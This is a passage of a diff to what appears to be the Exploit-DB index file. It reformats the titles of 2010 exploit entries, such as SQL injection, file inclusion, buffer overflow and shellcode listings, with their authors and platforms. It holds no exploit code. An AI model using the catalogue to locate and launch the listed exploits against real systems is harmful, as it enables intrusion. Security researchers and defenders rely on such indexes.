Request Forgery",2010-08-27,"RENO ",php,webapps,0 @@ -12942,61 +12942,61 @@ id,file,description,date,author,platform,type,port 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 SQL Injection Vulnerability",2010-08-27,Pouya_Server,asp,webapps,0 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 Multiple Remote File Inclusion Vulnerabilities",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"Textpattern CMS 4.2.0 Remote File Inclusion Vulnerability",2010-08-28,Sn!pEr.S!Te,php,webapps,0 -14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow Vulnerability",2010-08-28,LiquidWorm,windows,dos,0 +14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow Vulnerability",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP SQL Injection Vulnerability",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman v0.7.1 (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection Vulnerability",2010-08-28,[]0iZy5,php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability",2010-08-28,Dr.$audi,php,webapps,0 14830,platforms/linux/local/14830.py,"nginx v0.6.38 Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 -14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 Malicious SMP Buffer Overflow Vulnerability (SEH)",2010-08-29,"James Fitts",windows,local,0 -14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)",2010-08-29,"James Fitts",windows,dos,0 +14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow Vulnerability (SEH)",2010-08-29,"James Fitts",windows,local,0 +14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow Vulnerability (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability",2010-08-29,"Immortal Boy",php,webapps,0 14834,platforms/php/webapps/14834.txt,"Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities",2010-08-29,JosS,php,webapps,0 -14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script v1.3.8 Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 +14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 SQL Injection Vulnerability",2010-08-29,Sweet,php,webapps,0 14839,platforms/php/webapps/14839.txt,"GuestBookPlus HTML Injection & Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 -14840,platforms/windows/dos/14840.py,"Mereo v1.9.2 Remote HTTP Server Denial Of Service Vulnerability",2010-08-30,"CwG GeNiuS",windows,dos,0 +14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial Of Service Vulnerability",2010-08-30,"CwG GeNiuS",windows,dos,0 14841,platforms/php/webapps/14841.txt,"Seagull 0.6.7 Remote File Inclusion Vulnerability",2010-08-30,"FoX HaCkEr",php,webapps,0 14843,platforms/windows/dos/14843.txt,"Apple QuickTime ""_Marshaled_pUnk"" Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure Vulnerability",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip D3 Bi0s",php,webapps,0 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 -14849,platforms/php/webapps/14849.py,"mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 +14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14853,platforms/windows/remote/14853.py,"MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0 -14854,platforms/php/webapps/14854.py,"MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day",2010-09-01,Abysssec,php,webapps,0 +14854,platforms/php/webapps/14854.py,"MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day",2010-09-01,Abysssec,php,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN v0.4.2 Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"TFTP Desktop 2.5 Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0 -14866,platforms/novell/dos/14866.txt,"Novell Netware v6.5 OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 +14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 Remote/Local File Inclusion Vulnerability",2010-09-02,fred777,php,webapps,0 14869,platforms/windows/dos/14869.py,"MOAUB #2 - Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 14870,platforms/asp/webapps/14870.txt,"MOAUB #2 - Rainbowportal Multiple Remote Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 14875,platforms/multiple/remote/14875.txt,"Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 -14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 +14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"MOAUB #3 - Visinia 1.3 Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 -14883,platforms/windows/dos/14883.txt,"Intel Video Codecs v5 Remote Denial Of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 +14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial Of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 -14886,platforms/windows/remote/14886.py,"MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 +14886,platforms/windows/remote/14886.py,"MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14887,platforms/php/webapps/14887.txt,"MOAUB #4 - syndeocms 2.8.02 Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,"hadji samir",windows,dos,0 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0 -14894,platforms/php/webapps/14894.py,"A-Blog v2.0 (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0 +14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0 14895,platforms/windows/remote/14895.py,"MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"iJoomla Magazine 3.0.1 Remote File Inclusion Vulnerability",2010-09-05,LoSt.HaCkEr,php,webapps,0 14897,platforms/php/webapps/14897.txt,"chillyCMS 1.1.3 Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 14898,platforms/asp/webapps/14898.txt,"MOAUB #5 - IfNuke Multiple Remote Vulnerabilities 0day",2010-09-05,Abysssec,asp,webapps,0 -14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 -14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 +14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 +14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(""/bin/sh"", [0], [0 vars]) - 27 bytes",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager SQL Injection Vulnerability",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 @@ -13011,7 +13011,7 @@ id,file,description,date,author,platform,type,port 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 14925,platforms/linux/remote/14925.txt,"Weborf <= 0.12.2 Directory Traversal Vulnerability",2010-09-07,Rew,linux,remote,0 -14927,platforms/php/webapps/14927.txt,"MOAUB #7 - DynPage <= v1.0 Multiple Remote Vulnerabilities - 0day",2010-09-07,Abysssec,php,webapps,0 +14927,platforms/php/webapps/14927.txt,"MOAUB #7 - DynPage <= 1.0 - Multiple Remote Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 14928,platforms/novell/dos/14928.py,"MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow",2010-09-07,Abysssec,novell,dos,0 14931,platforms/php/webapps/14931.php,"Java Bridge v. 5.5 Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 @@ -13020,7 +13020,7 @@ id,file,description,date,author,platform,type,port 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability",2010-09-07,"hadji samir",windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 -14941,platforms/win32/remote/14941.rb,"Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 +14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 14943,platforms/asp/webapps/14943.txt,"MOAUB #8 - Sirang Web-Based D-Control Multiple Remote Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 14944,platforms/windows/local/14944.py,"MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 @@ -13059,15 +13059,15 @@ id,file,description,date,author,platform,type,port 14996,platforms/php/webapps/14996.txt,"Storyteller CMS (var) Local File Inclusion Vulnerability",2010-09-13,"BorN To K!LL",php,webapps,0 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 SQL Injection Vulnerability",2010-09-13,KnocKout,php,webapps,0 14998,platforms/php/webapps/14998.txt,"Joomla Component (com_jgen) SQL Injection Vulnerability",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 -14999,platforms/asp/webapps/14999.txt,"MOAUB #14 - FreeDiscussionForums v1.0 Multiple Remote Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 +14999,platforms/asp/webapps/14999.txt,"MOAUB #14 - FreeDiscussionForums 1.0 - Multiple Remote Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 15001,platforms/windows/remote/15001.html,"MOAUB #14 - Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 -15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 +15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0 15008,platforms/windows/dos/15008.py,"MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 15011,platforms/php/webapps/15011.txt,"MOAUB #15 - PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 -15013,platforms/windows/local/15013.pl,"MP3 Workstation Version 9.2.1.1.2 SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 -15014,platforms/php/webapps/15014.txt,"pixelpost v1.7.3 Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 +15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 +15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"MOAUB #16 - mojoportal Multiple Remote Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 @@ -13078,21 +13078,21 @@ id,file,description,date,author,platform,type,port 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 15029,platforms/php/webapps/15029.txt,"MOAUB #17 - phpmyfamily Multiple Remote Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 -15031,platforms/windows/local/15031.py,"DJ Studio Pro Version 8.1.3.2.1 SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 +15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service Vulnerability",2010-09-17,modpr0be,windows,dos,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint bmp crash Proof Of Concept",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"MOAUB #18 - Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0 -15037,platforms/php/webapps/15037.html,"MOAUB #18 - CMSimple XSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0 +15037,platforms/php/webapps/15037.html,"MOAUB #18 - CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection ""reviews.php""",2010-09-18,secret,php,webapps,0 15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 -15041,platforms/php/webapps/15041.py,"Maian Gallery v2 Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 +15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 15042,platforms/windows/remote/15042.py,"MOAUB #19 - Novell iPrint Client Browser Plugin call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 -15044,platforms/asp/webapps/15044.txt,"MOAUB #19 - JMD-CMS Multiple Remote Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 +15044,platforms/asp/webapps/15044.txt,"MOAUB #19 - JMD-CMS Multiple Remote Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 -15049,platforms/php/webapps/15049.txt,"BoutikOne v1 SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 +15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0 15056,platforms/windows/remote/15056.py,"MOAUB #20 - Java CMM readMabCurveData Stack Overflow",2010-09-20,Abysssec,windows,remote,0 @@ -13110,34 +13110,34 @@ id,file,description,date,author,platform,type,port 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (meta)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability",2010-09-21,fuzz,linux,local,0 -15075,platforms/php/webapps/15075.txt,"wpQuiz v2.7 Authentication Bypass Vulnerability",2010-09-21,KnocKout,php,webapps,0 +15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass Vulnerability",2010-09-21,KnocKout,php,webapps,0 15076,platforms/windows/dos/15076.py,"MOAUB #22 - Adobe Shockwave Director tSAC Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 15078,platforms/asp/webapps/15078.txt,"MOAUB #22 - gausCMS Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 -15080,platforms/php/webapps/15080.txt,"Skybluecanvas v1.1-r248 Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0 -15081,platforms/windows/local/15081.rb,"MP3 Workstation Version 9.2.1.1.2 SEH exploit (MSF)",2010-09-22,MadjiX,windows,local,0 +15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0 +15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH exploit (MSF)",2010-09-22,MadjiX,windows,local,0 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 -15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component v1.2.4 Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 +15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 15086,platforms/multiple/dos/15086.py,"MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 15088,platforms/windows/dos/15088.txt,"MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter v 2.1.2 SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 -15091,platforms/php/webapps/15091.txt,"GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0 +15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection Vulnerability",2010-09-23,Gamoscu,php,webapps,0 15092,platforms/php/webapps/15092.txt,"OvBB v0.16a Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 15094,platforms/windows/local/15094.py,"MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 -15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0 +15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0 15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80 15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0 -15106,platforms/asp/webapps/15106.txt,"MOAUB #25 - VisualSite CMS v1.3 Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 -15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 +15106,platforms/asp/webapps/15106.txt,"MOAUB #25 - VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 +15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 15112,platforms/windows/dos/15112.py,"MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow",2010-09-26,Abysssec,windows,dos,0 15114,platforms/php/webapps/15114.php,"MOAUB #26 - Zenphoto Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 -15118,platforms/asp/webapps/15118.txt,"Gokhun ASP Stok v1.0 Multiple Remote Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 +15118,platforms/asp/webapps/15118.txt,"Gokhun ASP Stok 1.0 - Multiple Remote Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection Vulnerability",2010-09-26,KnocKout,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 15121,platforms/php/webapps/15121.txt,"PBBoard 2.1.1 Multiple Remote Vulnerabilities",2010-09-27,JiKo,php,webapps,0 @@ -13147,18 +13147,18 @@ id,file,description,date,author,platform,type,port 15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0 -15133,platforms/windows/local/15133.pl,"iworkstation Version 9.3.2.1.4 seh exploit",2010-09-27,"sanjeev gupta",windows,local,0 +15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh exploit",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad Version 8.2.3.3.4 SEH overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 -15135,platforms/php/webapps/15135.txt,"Car Portal v2.0 BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 +15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 15139,platforms/asp/webapps/15139.txt,"MOAUB #28 - AtomatiCMS Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 15141,platforms/php/webapps/15141.txt,"MOAUB #28 - JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0 15143,platforms/php/webapps/15143.txt,"e107 v0.7.23 SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 -15144,platforms/windows/webapps/15144.txt,"Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 -15145,platforms/php/webapps/15145.txt,"Achievo v1.4.3 Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 -15146,platforms/php/webapps/15146.txt,"Achievo v1.4.3 CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 -15147,platforms/php/webapps/15147.txt,"Micro CMS v1.0 b1 Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0 